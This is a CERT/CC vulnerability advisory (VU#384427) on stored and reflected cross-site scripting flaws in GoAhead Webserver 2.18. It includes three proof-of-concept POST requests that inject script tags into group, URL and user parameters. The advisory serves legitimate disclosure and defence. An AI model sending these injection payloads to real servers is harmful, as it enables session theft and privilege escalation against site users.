search menu icon-carat-right cmu-wordmark

CERT Coordination Center

GoAhead Webserver multiple stored XSS vulnerabilities

Vulnerability Note VU#384427

Original Release Date: 2011-10-10 | Last Revised: 2011-10-10

Overview

GoAhead Webserver 2.18 and possibly previous or newer versions, are vulnerable to multiple stored and reflective cross site scripting (XSS) vulnerabilities.

Description

GoAhead Webserver software fails to sanitize POST requests sent to the multiple functions. As a result, stored and reflective cross site scripting (XSS) attacks can be conducted. An attacker can inject javascript code that will be run each time the specified webpage is accessed by inserting javascript code in the affected parameter.

According to the reporter the following webpages and parameters are affected by stored and reflective XSS vulnerabilities:

    • Stored XSS in group parameter of addgroup.asp.
    POST /goform/AddGroup HTTP/1.1
    group=<script>alert(1337)</script>&privilege=4&method=1&enabled=on&ok=OK

    Results:   Reflected XSS displayed in addgroup.asp, stored XSS in: adduser.asp, addlimit.asp, delgroup.asp.
    • Stored XSS in url parameter of addlimit.asp
    POST /goform/AddAccessLimit HTTP/1.1
    url=<script>alert(1337)</script>&group=test&method=3&ok=OK

    Results: Stored when user requests dellimit.asp.
    • Stored XSS in adduser.asp, User ID parameter.
    Note: for this to work, there must be at least one valid group created in
    addgroup.asp. In this example, you can swap out the group=<script>alert(1337)
    for whichever group name you added.  password= and passconf= can also be
    modified to whichever password you want the new user to have.

    POST /goform/AddUser HTTP/1.1
    user=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&group=%3Cscript%3Ealert%281337%2
    9%3C%2Fscript%3E&enabled=on&password=test&passconf=test&ok=OK

    Result: Reflected in reply, stored in: deluser.asp,dspuser.asp.

Impact

An attacker with access to the GoAhead Webserver can conduct a cross site scripting attack, which could be used to result in information leakage, privilege escalation, and/or denial of service.

Solution

We are currently unaware of a practical solution to this problem.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing a GoAhead Webserver using stolen credentials from a blocked network location.

Vendor Information

The reporter was unable to confirm if any previous or newer versions are vulnerable to these stored cross site scripting (XSS) vulnerabilities.

384427
 
Affected   Unknown   Unaffected

GoAhead Software, Inc.

Updated:  October 07, 2011

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.


CVSS Metrics

Group Score Vector
Base N/A N/A
Temporal N/A N/A
Environmental N/A

References

Credit

Thanks to Silent Dream for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: None
Severity Metric: 0.49
Date Public: 2011-10-10
Date First Published: 2011-10-10
Date Last Updated: 2011-10-10 12:58 UTC
Document Revision: 20

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.